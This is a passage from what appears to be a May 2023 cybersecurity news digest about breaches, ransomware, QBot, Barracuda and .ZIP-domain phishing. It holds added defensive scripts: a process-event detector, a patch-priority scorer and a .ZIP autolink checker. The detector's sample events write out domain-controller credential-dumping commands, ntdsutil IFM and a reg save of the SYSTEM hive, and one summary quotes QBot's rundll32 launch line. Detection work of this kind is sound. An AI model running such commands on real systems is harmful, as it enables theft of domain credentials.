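SEVERITY_RANK = {"low": 0, "medium": 1, "high": 2}

def parse_4688(line: str) -> dict:
    """Parse one flattened 'Key=Value|Key=Value' process-creation record (constructed format)."""
    fields = {}
    for part in line.strip().split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]

def match_rules(event: dict) -> list:
    """Names of every rule whose image and command-line conditions both hold for this event."""
    image = basename(event.get("NewProcessName", ""))
    cmdline = event.get("CommandLine", "")
    hits = []
    for rule in RULES:
        if rule.image is not None and not rule.image.search(image):
            continue
        if rule.cmdline is not None and not rule.cmdline.search(cmdline):
            continue
        hits.append(rule.name)
    return hits

def detect(lines) -> list:
    """One finding per event that matches at least one rule, tagged with the highest severity hit."""
    findings = []
    for line in lines:
        event = parse_4688(line)
        hits = match_rules(event)
        if not hits:
            continue
        severity = max((r.severity for r in RULES if r.name in hits), key=SEVERITY_RANK.__getitem__)
        findings.append({
            "computer": event.get("Computer", "?"),
            "user": event.get("SubjectUserName", "?"),
            "image": basename(event.get("NewProcessName", "")),
            "rules": hits,
            "severity": severity,
        })
    return findings

# Constructed sample events, not real telemetry. Hosts, users and paths are made up.
SAMPLE_EVENTS = [
    r'EventID=4688|Computer=DC01|SubjectUserName=svc_backup|NewProcessName=C:\Windows\System32\cmd.exe|CommandLine=cmd.exe /C "wmic path win32_logicaldisk get caption,filesystem,freespace,size,volumename"',
    r'EventID=4688|Computer=WS07|SubjectUserName=jdoe|NewProcessName=C:\Program Files\Microsoft Office\root\Office16\MSOHTMED.exe|CommandLine=MSOHTMED.exe C:\Users\Public\update.dat',
    r'EventID=4688|Computer=DC01|SubjectUserName=svc_backup|NewProcessName=C:\Windows\System32\ntdsutil.exe|CommandLine=ntdsutil.exe "ac i ntds" ifm "create full C:\Windows\Temp\ifm" q q',
    r'EventID=4688|Computer=DC01|SubjectUserName=svc_backup|NewProcessName=C:\Windows\System32\reg.exe|CommandLine=reg save HKLM\SYSTEM C:\Windows\Temp\sys.hiv',
    r'EventID=4688|Computer=WS07|SubjectUserName=jdoe|NewProcessName=C:\Windows\System32\wbem\WMIC.exe|CommandLine=wmic os get caption',
    r'EventID=4688|Computer=WS07|SubjectUserName=jdoe|NewProcessName=C:\Windows\System32\notepad.exe|CommandLine=notepad.exe notes.txt',
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f'[{f["severity"]:6}] {f["computer"]}/{f["user"]} {f["image"]}: {", ".join(f["rules"])}')
```

                The benign `wmic os get caption` event is deliberately included: a rule keyed on the wmic binary alone would fire on routine administration, so the rule matches the specific logicaldisk enumeration instead. In production the same rules would run over real 4688 or Sysmon event 1 records and the two "high" hits on a DC would be correlated with the account that ran them.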


                Smashing Security podcast #324: .ZIP domains, AI lies, and did social media inflame a riot?

                industry
                2023-05-31 https://grahamcluley.com/smashing-security-podcast-324/
                ChatGPT hallucinations cause turbulence in court, a riot in Wales may have been ignited on social media, and do you think .MOV is a good top-level domain for "a website that moves you"? All this and much much more is discussed in the latest edition of the "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Mark Stockley. Plus don't miss our featured interview with David Ahn of Centripetal. "

                Autosummary: Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Guest: Mark Stockley – @markstockley Episode links: Sponsored by: Bitwarden – Password security you can trust. "


                Argentina allows morning-after pill to be bought over counter

                latam
                2023-05-31 https://www.bbc.co.uk/news/world-latin-america-65772878?at_medium=RSS&at_campaign=KARANGA
                The health ministry says making the pill more easily available "removes an important barrier". "

                Autosummary: "


                The root causes of API incidents and data breaches

                financial
                2023-05-30 https://www.helpnetsecurity.com/2023/05/30/root-causes-api-incidents-video/

                API calls make up the majority of our digital lives. Take, for example, the everyday use of a cloud-based food delivery app, which could involve up to 25 API calls. Between the order being placed, transmission to the restaurant, the coordination of delivery, and the processing of payments, this multi-party transaction includes at least four third-party providers, and a high volume of sensitive data shared between them. The top two highest-impact breach vectors for API … More

                The post The root causes of API incidents and data breaches appeared first on Help Net Security.

                "

                Autosummary: "


                Sneaky DogeRAT Trojan Poses as Popular Apps, Targets Indian Android Users

                exploits
                2023-05-30 https://thehackernews.com/2023/05/sneaky-dogerat-trojan-poses-as-popular.html
                A new open source remote access trojan (RAT) called DogeRAT targets Android users primarily located in India as part of a sophisticated malware campaign. The malware is distributed via social media and messaging platforms under the guise of legitimate applications like Opera Mini, OpenAI ChatGOT, and Premium versions of YouTube, Netflix, and Instagram. "Once installed on a victim's device, the "

                Autosummary: "The malware is capable of tracking device location, recording the microphone, retrieving contact lists, accessing call, SMS, clipboard, and notification logs, viewing installed applications, downloading and uploading files, viewing connectivity status, and executing additional commands from the C2 server," researcher Jared Wilson said. "


                CAPTCHA-Breaking Services with Human Solvers Helping Cybercriminals Defeat Security

                ciber
                2023-05-30 https://thehackernews.com/2023/05/captcha-breaking-services-with-human.html
                Cybersecurity researchers are warning about CAPTCHA-breaking services that are being offered for sale to bypass systems designed to distinguish legitimate users from bot traffic. "Because cybercriminals are keen on breaking CAPTCHAs accurately, several services that are primarily geared toward this market demand have been created," Trend Micro said in a report published last week. "These "

                Autosummary: "CAPTCHAs are common tools used to prevent spam and bot abuse, but the increasing use of CAPTCHA-breaking services has made CAPTCHAs less effective," Costoya said. "


                Implementing Risk-Based Vulnerability Discovery and Remediation

                exploits
                2023-05-30 https://thehackernews.com/2023/05/implementing-risk-based-vulnerability.html
                In this day and age, vulnerabilities in software and systems pose a considerable danger to businesses, which is why it is essential to have an efficient vulnerability management program in place. To stay one step ahead of possible breaches and reduce the damage they may cause, it is crucial to automate the process of finding and fixing vulnerabilities depending on the level of danger they pose. "

                Autosummary: Created by security researchers, government agencies, and other groups that monitor the security landscape, this data is a crucial instrument in the battle against cyber attacks, as it provides the latest information on the most recent threats and vulnerabilities, threat actors' strategies, methodologies, and processes, as well as indicators of compromise (IOCs) that may be utilized to identify and prevent attacks. Implement automation: implementing automation in your vulnerability management is a critical step in maintaining a sound security posture. Automation can be used to detect and prioritize threats, apply patches or software upgrades, alert specialists and keep an audit trail, minimizing the time and effort spent, as businesses must act promptly to mitigate the likelihood of exploitation. Threat intelligence feeds: a threat intelligence feed is a data stream that provides information on the latest cyber threats and attacks, including vulnerabilities, malware, phishing, and other malicious activities. Patch management solutions, such as Action1, can search an organization's environment for missing patches, rank them based on their criticality, and automatically deploy them to impacted systems based on patch deployment policies. "
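                The item above describes ranking missing patches by criticality, using an exploitation feed, and keeping an audit trail, but does not show how the ranking is computed. The script below is an added example, not Action1's or The Hacker News' code: it scores each finding from its CVSS base score, whether the CVE appears in an exploited-in-the-wild feed, whether the asset is internet-exposed, and an asset criticality rating, then emits an ordered plan with the reasons for each score. The weights, the 1..5 criticality scale, the SLA buckets, and the inventory (asset names, CVSS values, patch-availability flags) are this example's own constructed inputs; the feed contains only CVE-2023-2868, the Barracuda ESG zero-day covered elsewhere in this digest, and the flags say nothing about the real vendors' patch status.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Asset:
    name: str
    internet_exposed: bool
    criticality: int          # assumed 1..5 scale; 5 = business-critical (DC, mail gateway, payments)

@dataclass(frozen=True)
class Finding:
    asset: Asset
    cve: str
    cvss: float               # CVSS base score, 0.0..10.0
    patch_available: bool

# Constructed threat-intelligence feed: CVEs reported as exploited in the wild.
EXPLOITED_IN_THE_WILD = {"CVE-2023-2868"}

# Assumed weighting scheme (this example's own, not a vendor's): CVSS is the base,
# multiplied up for known exploitation, internet exposure and asset criticality.
EXPLOITED_FACTOR = 1.5
EXPOSED_FACTOR = 1.3

def risk_score(f: Finding, exploited: set = EXPLOITED_IN_THE_WILD) -> float:
    score = f.cvss
    if f.cve in exploited:
        score *= EXPLOITED_FACTOR
    if f.asset.internet_exposed:
        score *= EXPOSED_FACTOR
    score *= 0.8 + 0.1 * f.asset.criticality      # 0.9 (criticality 1) .. 1.3 (criticality 5)
    return round(score, 2)

def remediation_action(score: float, patch_available: bool) -> str:
    """Assumed SLA buckets; a finding with no vendor patch is routed to mitigation instead."""
    if not patch_available:
        return "no vendor patch: apply mitigation or isolate, re-check feed daily"
    if score >= 20:
        return "patch within 24h"
    if score >= 10:
        return "patch within 7 days"
    return "patch in next maintenance window"

def prioritize(findings, exploited=EXPLOITED_IN_THE_WILD) -> list:
    """Ordered remediation plan (highest risk first); each entry records why it scored as it did."""
    plan = []
    for f in findings:
        s = risk_score(f, exploited)
        reasons = [label for label, hit in (
            ("exploited-in-the-wild", f.cve in exploited),
            ("internet-exposed", f.asset.internet_exposed),
            (f"criticality={f.asset.criticality}", True),
        ) if hit]
        plan.append({"asset": f.asset.name, "cve": f.cve, "score": s,
                     "reasons": reasons, "action": remediation_action(s, f.patch_available)})
    plan.sort(key=lambda p: p["score"], reverse=True)
    return plan

# Constructed inventory: asset attributes, CVSS values and patch flags are sample inputs only.
SAMPLE_FINDINGS = [
    Finding(Asset("mail-gw-01", internet_exposed=True, criticality=5), "CVE-2023-2868", 9.8, True),
    Finding(Asset("lab-esg-test", internet_exposed=False, criticality=1), "CVE-2023-2868", 9.8, True),
    Finding(Asset("build-server", internet_exposed=False, criticality=3), "CVE-2023-28131", 9.6, False),
]

if __name__ == "__main__":
    for item in prioritize(SAMPLE_FINDINGS):
        print(f'{item["score"]:6.2f}  {item["asset"]:13} {item["cve"]:15} {item["action"]}  ({", ".join(item["reasons"])})')
```

                The same CVE on two assets lands in two different SLA buckets, which is the point of risk-based rather than CVSS-only ranking: the exposed, business-critical gateway goes first and the isolated lab box can wait for the weekly window. The plan entries are what you would write to the audit trail before the patch job runs.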


                Beware of the new phishing technique “file archiver in the browser” that exploits zip domains

                financial exploits
                2023-05-30 https://securityaffairs.com/146828/cyber-crime/file-archiver-in-the-browser-phishing.html

                “file archiver in the browser” is a new phishing technique that can be exploited by phishers when victims visit a .ZIP domain. A new phishing technique called “file archiver in the browser” can be used by phishers to “emulate” a file archiver software in a web browser when a victim visits a .ZIP domain. The […]

                The post Beware of the new phishing technique “file archiver in the browser” that exploits zip domains appeared first on Security Affairs.

                "

                Autosummary: "


                Attackers hacked Barracuda ESG appliances via zero-day since October 2022

                exploits
                2023-05-30 https://www.helpnetsecurity.com/2023/05/30/barracuda-esg-zero-day/

                Barracuda says that the recently discovered compromise of some of its clients’ ESG appliances via a zero-day vulnerability (CVE-2023-2868) resulted in the deployment of three types of malware and data exfiltration. The company did not say how many organizations have been breached, but has confirmed that the “earliest identified evidence of exploitation of CVE-2023-2868 is currently October 2022.” Zero-day exploited, Barracuda ESG appliances backdoored: On May 23, Barracuda Networks publicly acknowledged that attackers have been … More

                The post Attackers hacked Barracuda ESG appliances via zero-day since October 2022 appeared first on Help Net Security.

                "

                Autosummary: "


                Music streaming royalties to be discussed by government

                government
                2023-05-30 https://www.bbc.co.uk/news/technology-65753759?at_medium=RSS&at_campaign=KARANGA
                It will look into claims of unfairness amid reports labels receive the lion's share of royalties. "

                Autosummary: "


                Barracuda zero-day abused since 2022 to drop new malware, steal data

                exploits
                2023-05-30 https://www.bleepingcomputer.com/news/security/barracuda-zero-day-abused-since-2022-to-drop-new-malware-steal-data/
                Network and email security firm Barracuda today revealed that a recently patched zero-day vulnerability had been exploited for at least seven months to backdoor customers' Email Security Gateway (ESG) appliances with custom malware and steal data. [...] "

                Autosummary: Customers are advised to check if their ESG appliances are up-to-date, stop using breached appliances and request a new virtual or hardware appliance, rotate all credentials linked to hacked appliances, and check their network logs for IOCs shared today and for connections from unknown IPs. "


                Microsoft finds macOS bug that lets hackers bypass SIP root restrictions

                exploits
                2023-05-30 https://www.bleepingcomputer.com/news/security/microsoft-finds-macos-bug-that-lets-hackers-bypass-sip-root-restrictions/
                Apple has recently addressed a vulnerability that lets attackers with root privileges bypass System Integrity Protection (SIP) to install "undeletable" malware and access the victim's private data by circumventing Transparency, Consent, and Control (TCC) security checks. [...] "

                Autosummary: This is not the first such macOS vulnerability reported by Microsoft researchers in recent years, with another SIP bypass dubbed Shrootless reported in 2021, allowing attackers to perform arbitrary operations on compromised Macs, escalate privileges to root, and potentially install rootkits on vulnerable devices. "


                RomCom malware spread via Google Ads for ChatGPT, GIMP, more

                exploits
                2023-05-30 https://www.bleepingcomputer.com/news/security/romcom-malware-spread-via-google-ads-for-chatgpt-gimp-more/
                A new campaign distributing the RomCom backdoor malware is impersonating the websites of well-known or fictional software, tricking users into downloading and launching malicious installers. [...] "

                Autosummary: One of the malicious websites that's still online (BleepingComputer). Some of the malicious sites used in the said time period are: gllmp.com (offline), impersonates the free and open-source image editor; gotomeet.us (offline), impersonates the cloud video meeting and conferencing app; singularlabs.org (offline), impersonates a PC-cleaning tool; chatgpt4beta.com (online), impersonates the AI-powered chatbot platform; astrachats.com (offline), impersonates the secure chat software; devolutionrdp.com (online), impersonates a remote desktop management tool; cozy-sofware.com (offline), impersonates a remote desktop management tool; vectordmanagesoft.com (offline), impersonates a remote desktop management tool; devolrdm.com (online), impersonates a remote desktop management tool; dirwinstat.com (online), impersonates a disk usage viewer and cleanup tool. These fake sites are promoted through Google advertisements and highly targeted phishing emails, with most of the victims based in Eastern Europe. The current campaign: Trend Micro's report on the latest RomCom activity lists several examples of websites used by the malware operators between December 2022 and April 2023 that impersonate legitimate software, like Gimp, Go To Meeting, ChatGPT, WinDirStat, AstraChat, System Ninja, Devolutions' Remote Desktop Manager, and more. "


                Barracuda Networks patches zero-day vulnerability in Email Security Gateway

                exploits
                2023-05-30 https://www.malwarebytes.com/blog/news/2023/05/barracuda-networks-patches-zero-day-vulnerability-in-email-security-gateway

                Categories: Exploits and vulnerabilities

                Categories: News

                Barracuda Networks issued a patch for a zero-day vulnerability in its Email Security Gateway that was actively being exploited


                The post Barracuda Networks patches zero-day vulnerability in Email Security Gateway appeared first on Malwarebytes Labs.

                "

                Autosummary: Posted: May 30, 2023. On May 20, Barracuda Networks issued a patch for a zero-day vulnerability in its Email Security Gateway (ESG) appliance. "


                Top public cloud security concerns for the media and entertainment industry

                industry
                2023-05-29 https://www.helpnetsecurity.com/2023/05/29/media-and-entertainment-ndustry-cloud-storage/

                Media and entertainment (M&E) companies are rapidly turning to cloud storage in efforts to upgrade their security measures, according to Wasabi. Survey findings highlighted that, while M&E organizations are still relatively new to cloud storage (69% of respondents had been using cloud storage for three years or less), public cloud storage use is on the rise, with 89% of respondents looking to increase (74%) or maintain (15%) their cloud services. Balancing budgets, security, and data loss … More

                The post Top public cloud security concerns for the media and entertainment industry appeared first on Help Net Security.

                "

                Autosummary: The top three biggest security concerns M&E organizations have with public cloud include: Lack of native security services (42%) Lack of native backup, disaster and data protection tools and services (39%) Lack of experience with cloud platform or adequate security training (38%) “Organizations in the media and entertainment industry are flocking to cloud storage as their digital assets need to be stored securely, cost-effectively and accessed quickly,” said Whit Jackson, VP of Media and Entertainment at Wasabi. "


                Company size doesn’t matter when it comes to cyberattacks

                ciber
                2023-05-29 https://www.helpnetsecurity.com/2023/05/29/larger-organizations-cyberattacks/

                65% of organizations in the enterprise sector suffered a cyberattack within the last 12 months, which is similar to the results among companies of all sizes (68%), according to Netwrix. Larger organizations are a more frequent target for cyberattacks The most common security incidents are also the same: phishing, ransomware and user account compromise. However, larger organizations are a more frequent target for ransomware or other malware attacks: 48% of enterprises experienced this type of … More

                The post Company size doesn’t matter when it comes to cyberattacks appeared first on Help Net Security.

                "

                Autosummary: "


                FTX: Singapore state fund Temasek cuts pay after failed investment

                government
                2023-05-29 https://www.bbc.co.uk/news/business-65743247?at_medium=RSS&at_campaign=KARANGA
                Last year, Temasek Holdings wrote off all of the $275m (£222.8m) it had invested in FTX. "

                Autosummary: "


                New GobRAT Remote Access Trojan Targeting Linux Routers in Japan

                exploits
                2023-05-29 https://thehackernews.com/2023/05/new-gobrat-remote-access-trojan.html
                Linux routers in Japan are the target of a new Golang remote access trojan (RAT) called GobRAT. "Initially, the attacker targets a router whose WEBUI is open to the public, executes scripts possibly by using vulnerabilities, and finally infects the GobRAT," the JPCERT Coordination Center (JPCERT/CC) said in a report published today. The compromise of an internet-exposed router is followed by the "

                Autosummary: "


                Attackers use encrypted RPMSG messages in Microsoft 365 targeted phishing attacks

                financial
                2023-05-29 https://securityaffairs.com/146768/cyber-crime/rpmsg-messages-microsoft-365-phishing.html

                Experts warn of phishing attacks that are combining the use of compromised Microsoft 365 accounts and .rpmsg encrypted emails. Trustwave researchers have observed threat actors using encrypted RPMSG attachments sent via compromised Microsoft 365 accounts in a phishing campaign aimed at stealing Microsoft credentials. RPMSG files are used to deliver e-mails with Rights-Managed Email Object Protocol enabled. […]

                The post Attackers use encrypted RPMSG messages in Microsoft 365 targeted phishing attacks appeared first on Security Affairs.

                "

                Autosummary: The script uses the open source FingerprintJS library to collect recipient’s data, including visitor ID, connect token (hardcoded from the configuration), connect hash (hardcoded from the configuration), video card renderer information, system language, device memory, hardware concurrency (# of processor), browser plugins installed, browser window size, orientation, and screen resolution, and OS architecture. "


                MCNA Dental data breach impacts 8.9 million people after ransomware attack

                financial exploits ransomware
                2023-05-29 https://www.bleepingcomputer.com/news/security/mcna-dental-data-breach-impacts-89-million-people-after-ransomware-attack/
                Managed Care of North America (MCNA) Dental has published a data breach notification on its website, informing almost 9 million patients that their personal data were compromised. [...] "

                Autosummary: Exposed data: full name; address; date of birth; phone number; email; Social Security number; driver’s license number; government-issued ID number; health insurance (plan information, insurance company, member number, Medicaid-Medicare ID numbers); care for teeth or braces (visits, dentist name, doctor name, past care, x-rays/photos, medicines, and treatment); bills and insurance claims. The notification filed with the Office of the Maine Attorney General says the breach impacted 8,923,662 people, including patients, parents, guardians, or guarantors. "


                AceCryptor: Cybercriminals' Powerful Weapon, Detected in 240K+ Attacks

                ciber
                2023-05-29 https://thehackernews.com/2023/05/acecryptor-cybercriminals-powerful.html
                A crypter (alternatively spelled cryptor) malware dubbed AceCryptor has been used to pack numerous strains of malware since 2016. Slovak cybersecurity firm ESET said it identified over 240,000 detections of the crypter in its telemetry in 2021 and 2022. This amounts to more than 10,000 hits per month. Some of the prominent malware families contained within AceCryptor are SmokeLoader, RedLine "

                Autosummary: The countries with the most detections include Peru, Egypt, Thailand, Indonesia, Turkey, Brazil, Mexico, South Africa, Poland, and India. "


                3 Challenges in Building a Continuous Threat Exposure Management (CTEM) Program and How to Beat Them

                ransomware
                2023-05-29 https://thehackernews.com/2023/05/3-challenges-in-building-continuous.html
                If you're a cybersecurity professional, you're likely familiar with the sea of acronyms our industry is obsessed with. From CNAPP, to CWPP, to CIEM and all of the myriad others, there seems to be a new initialism born each day. In this article, we'll look at another trending acronym – CTEM, which stands for Continuous Threat Exposure Management – and the often-surprising challenges that come "

                Autosummary: (Gartner, 21 July 2022, Implement a Continuous Threat Exposure Management (CTEM) Program.) Download our new whitepaper, Establishing a Modern Exposure Management Program, and discover: why critical vulnerability does not equal risk; the different types of exposures impacting organizational security posture; the key fundamentals of a modern exposure management program designed for an evolving risk landscape; and more. Challenge 2 – Seeing the bird's eye view: a comprehensive CTEM program covers many different areas, from Cloud, to AD, to software vulnerabilities, to network security and basically everything else. Challenge 1 – Getting non-security and security on the same page: it's a well-known fact that IT/infrastructure/DevOps/application, etc. teams and security teams don't always speak the same language; this is problematic in numerous ways, but when implementing new programs or undertakings, this disconnect can become even more problematic. "


                Lockbit ransomware attack on MCNA Dental impacts 8.9M individuals

                exploits ransomware
                2023-05-29 https://securityaffairs.com/146804/data-breach/mcna-data-breach.html

                Managed Care of North America (MCNA) Dental disclosed a data breach that impacted more than 8.9 million individuals. Managed Care of North America (MCNA) Dental suffered a data breach that impacted 8,923,662 patients. MCNA Dental is one of the largest US dental care and oral health insurance providers. The security breach exposed the personal information […]

                The post Lockbit ransomware attack on MCNA Dental impacts 8.9M individuals appeared first on Security Affairs.

                "

                Autosummary: Stolen data includes demographic information to identify and contact patients, such as full name, date of birth, address, telephone and email; Social Security number; driver’s license number or government-issued identification number; health insurance information, such as name of plan/insurer/government payor, member/Medicaid/Medicare ID number, plan and/or group number; and information regarding dental/orthodontic care. "


                Capita hack: 90 organisations report data breaches to watchdog

                financial
                2023-05-29 https://www.bbc.co.uk/news/technology-65746518?at_medium=RSS&at_campaign=KARANGA
                The privacy watchdog is urging groups using the outsourcing giant to check if data has been exposed. "

                Autosummary: "


                CISA adds recently patched Barracuda zero-day to its Known Exploited Vulnerabilities catalog

                exploits
                2023-05-28 https://securityaffairs.com/146729/security/cisa-barracuda-0day-catalog.html

                US CISA added a recently patched Barracuda zero-day vulnerability to its Known Exploited Vulnerabilities catalog. US Cybersecurity and Infrastructure Security Agency (CISA) added a recently patched Barracuda zero-day vulnerability to its Known Exploited Vulnerabilities Catalog. This week, the network security solutions provider Barracuda warned customers that some of its Email Security Gateway (ESG) appliances were recently breached […]

                The post CISA adds recently patched Barracuda zero-day to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.

                "

                Autosummary: "


                Week in review: Zyxel firewalls vulnerability, phishing campaign targets ChatGPT users

                financial exploits
                2023-05-28 https://www.helpnetsecurity.com/2023/05/28/week-in-review-zyxel-firewalls-vulnerability-phishing-campaign-targets-chatgpt-users/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Wireless Broadband Alliance CEO on key drivers for Wi-Fi adoption in enterprise networks This Help Net Security interview with Tiago Rodrigues, CEO at Wireless Broadband Alliance (WBA), delves into the future of enterprise networking, exploring the significant role of Wi-Fi 6E and Private 5G. Navigating the quantum leap in cybersecurity In this Help Net Security interview, we sit down with … More

                The post Week in review: Zyxel firewalls vulnerability, phishing campaign targets ChatGPT users appeared first on Help Net Security.

                "

                Autosummary: Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Wireless Broadband Alliance CEO on key drivers for Wi-Fi adoption in enterprise networks This Help Net Security interview with Tiago Rodrigues, CEO at Wireless Broadband Alliance (WBA), delves into the future of enterprise networking, exploring the significant role of Wi-Fi 6E and Private 5G. Navigating the quantum leap in cybersecurity In this Help Net Security interview, we sit down with Dr. Atsushi Yamada, the newly appointed CEO of ISARA, a security solutions company specializing in creating quantum-safe cryptography. New infosec products of the week: May 26, 2023 Here’s a look at the most interesting products from the past week, featuring releases from Axiado, Delinea, Netscout, Radware, and Veriff. "


                Clever ‘File Archiver In The Browser’ phishing trick uses ZIP domains

                financial
                2023-05-28 https://www.bleepingcomputer.com/news/security/clever-file-archiver-in-the-browser-phishing-trick-uses-zip-domains/
                A new "File Archivers in the Browser" phishing kit abuses ZIP domains by displaying fake WinRAR or Windows File Explorer windows in the browser to convince users to launch malicious files. [...] "

                Autosummary: Fake in-browser WinRar screen pretending to open a ZIP archive (Source: BleepingComputer). To make the fake WinRar window even more convincing, the researchers implemented a fake security Scan button that, when clicked, says that the files were scanned and no threats were detected. When you click on that link, your browser will attempt to open the https://setup.zip site, which could redirect you to another site, show an HTML page, or prompt you to download a file. "
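                Both .ZIP-domain items in this digest (the Security Affairs "file archiver in the browser" write-up above and this BleepingComputer one) rest on the same mechanic: a file name such as setup.zip typed into a message now looks like a hostname, so a browser or mail client may autolink it and a click opens https://setup.zip instead of a local file. The script below is an added example, not code from either article or from the researchers they cite. It scans message text for bare tokens that end in .zip or .mov (the two TLDs named on this page), keeps only those whose labels are valid DNS labels, skips tokens that are already part of an explicit URL with a real host, reports the URL a click would try, and offers a defang rewrite (setup[.]zip) for outbound mail. The sample message is constructed; example.com is a reserved documentation domain.

```python
import re

# TLDs that collide with common file extensions; .zip and .mov are the two named on this page.
RISKY_TLDS = ("zip", "mov")

URL_RE = re.compile(r"https?://\S+", re.I)
# A bare token like setup.zip or walkthrough.mov: not preceded by a word/dot/hyphen character,
# not followed by more label text, but a sentence-ending "." after it is allowed.
TOKEN_RE = re.compile(
    r"(?<![\w.-])([A-Za-z0-9_-]+(?:\.[A-Za-z0-9_-]+)*\.(?:%s))(?![\w-])(?!\.[A-Za-z0-9])"
    % "|".join(RISKY_TLDS),
    re.I,
)
# Hostname label per RFC 952/1123: letters, digits, hyphens, no leading or trailing hyphen.
LABEL_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")

def is_resolvable_hostname(token: str) -> bool:
    """True if every label could be a DNS label, i.e. a browser or mail client may autolink it."""
    return all(LABEL_RE.match(label) for label in token.split("."))

def find_autolink_risks(text: str) -> list:
    """File-name-looking tokens that would resolve as hostnames, with the URL a click would open."""
    without_urls = URL_RE.sub(" ", text)        # explicit URLs keep their real host; skip them
    risks = []
    for m in TOKEN_RE.finditer(without_urls):
        token = m.group(1)
        if is_resolvable_hostname(token):
            risks.append({"token": token, "url": "https://" + token.lower()})
    return risks

def _defang_token(m: re.Match) -> str:
    token = m.group(1)
    return token.replace(".", "[.]") if is_resolvable_hostname(token) else token

def defang(text: str) -> str:
    """Rewrite risky bare tokens as setup[.]zip so clients stop autolinking; explicit URLs are left intact."""
    out, pos = [], 0
    for u in URL_RE.finditer(text):
        out.append(TOKEN_RE.sub(_defang_token, text[pos:u.start()]))
        out.append(u.group(0))
        pos = u.end()
    out.append(TOKEN_RE.sub(_defang_token, text[pos:]))
    return "".join(out)

# Constructed message, not from either article.
SAMPLE_MESSAGE = (
    "Hi, the installer is in setup.zip and the screen recording is walkthrough.mov. "
    "Ignore invoice_2023.zip, that was sent by mistake. "
    "The official build is at https://example.com/releases/build-2023.zip instead."
)

if __name__ == "__main__":
    for r in find_autolink_risks(SAMPLE_MESSAGE):
        print(f'{r["token"]} -> a click may open {r["url"]}')
    print(defang(SAMPLE_MESSAGE))
```

                invoice_2023.zip is reported nowhere because an underscore is not a valid hostname character, so it cannot resolve; build-2023.zip inside the explicit example.com URL is a path component, not a host, and is left alone. The same two functions can be dropped into a mail gateway or chat bot as a pre-send check.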


                Industrial automation giant ABB disclosed data breach after ransomware attack

                financial exploits ransomware industry
                2023-05-28 https://securityaffairs.com/146752/cyber-crime/abb-ransomware-attack.html

                Swiss electrification and automation technology giant ABB confirmed it has suffered a data breach after a ransomware attack. ABB has more than 105,000 employees and has $29.4 billion in revenue for 2022. On May 7, 2023, the Swiss multinational company, leading electrification and automation technology provider, suffered a cyber attack that reportedly impacted its business operations. […]

                The post Industrial automation giant ABB disclosed data breach after ransomware attack appeared first on Security Affairs.


                Critical OAuth Vulnerability in Expo Framework Allows Account Hijacking

                exploits
                2023-05-27 https://thehackernews.com/2023/05/critical-oauth-vulnerability-in-expo.html
                A critical security vulnerability has been disclosed in the Open Authorization (OAuth) implementation of the application development framework Expo.io. The shortcoming, assigned the CVE identifier CVE-2023-28131, has a severity rating of 9.6 on the CVSS scoring system. API security firm Salt Labs said the issue rendered services using the framework susceptible to credential leakage, which could

                Autosummary: "The vulnerability would have allowed a potential attacker to trick a user into visiting a malicious link, logging in to a third-party auth provider, and inadvertently revealing their third-party auth credentials," Expo's James Ide said.


                US and Mexico sound alarm over cosmetic surgery-linked fungal outbreak

                latam
                2023-05-27 https://www.bbc.co.uk/news/health-65731544?at_medium=RSS&at_campaign=KARANGA
                The US and Mexico are urging the WHO to declare a public health emergency over the outbreak.


                Lionel Messi: Destiny - new documentary goes inside Argentina's World Cup win

                latam
                2023-05-27 https://www.bbc.co.uk/sport/football/65690051?at_medium=RSS&at_campaign=KARANGA
                A new BBC documentary tells the story of Argentina's 2022 World Cup win from the point of view of the players and manager.

                Autosummary: Even the typically mild-mannered Messi took issue with a comment from Van Gaal, who had said the Argentina captain did not "participate much" when his team lost the ball. After the final whistle, the Argentina players taunted their opponents, with Martinez - who saved two penalties in the shootout that followed a 2-2 draw - shouting at Netherlands boss Louis van Gaal.


                New Buhti ransomware operation uses rebranded LockBit and Babuk payloads

                exploits ransomware
                2023-05-27 https://securityaffairs.com/146700/cyber-crime/buhti-ransomware-rebranded-lockbit-babuk.html

                The recently identified Buhti operation targets organizations worldwide with rebranded LockBit and Babuk ransomware variants. Researchers from Symantec discovered a new ransomware operation called Buhti (aka Blacktail) that is using LockBit and Babuk variants to target Linux and Windows systems worldwide. The ransomware operation does not have its own ransomware payload; however, it uses a custom information […]

                The post New Buhti ransomware operation uses rebranded LockBit and Babuk payloads appeared first on Security Affairs.

                Autosummary: The information stealer used by the group is written in Golang; it allows operators to look for specific files (pdf, .php, .png, .ppt, .psd, .rar, .raw, .rtf, .sql, .svg, .swf, .tar, .txt, .wav, .wma, .wmv, .xls, .xml, .yml, .zip, .aiff, .aspx, .docx, .epub, .json, .mpeg, .pptx, .xlsx, .yaml).


                CISA warns govt agencies of recently patched Barracuda zero-day

                exploits
                2023-05-27 https://www.bleepingcomputer.com/news/security/cisa-warns-govt-agencies-of-recently-patched-barracuda-zero-day/
                CISA warned of a recently patched zero-day vulnerability exploited last week to hack into Barracuda Email Security Gateway (ESG) appliances. [...]


                QBot malware abuses Windows WordPad EXE to infect devices

                exploits
                2023-05-27 https://www.bleepingcomputer.com/news/security/qbot-malware-abuses-windows-wordpad-exe-to-infect-devices/
                The QBot malware operation has started to abuse a DLL hijacking flaw in the Windows 10 WordPad program to infect computers, using the legitimate program to evade detection by security software. [...]

                Autosummary: This PNG file (actually a DLL) is then executed using rundll32.exe with the following command: rundll32 c:\users\public\default.png,print QBot will now quietly run in the background, stealing emails for use in further phishing attacks and eventually downloading other payloads, such as Cobalt Strike (a post-exploitation toolkit threat actors use to gain initial access to the infected device).


                Is the BlackByte ransomware gang behind the City of Augusta attack?

                exploits government ransomware
                2023-05-27 https://securityaffairs.com/146717/hacking/city-of-augusta-cyberattack.html

                The city of Augusta in Georgia, U.S., admitted that the recent IT system outage was caused by a cyber attack. While the City of Augusta revealed that a cyberattack caused the recent IT outage, the BlackByte ransomware gang has claimed responsibility for the attack. The attack took place on May 21, the administrator at the City […]

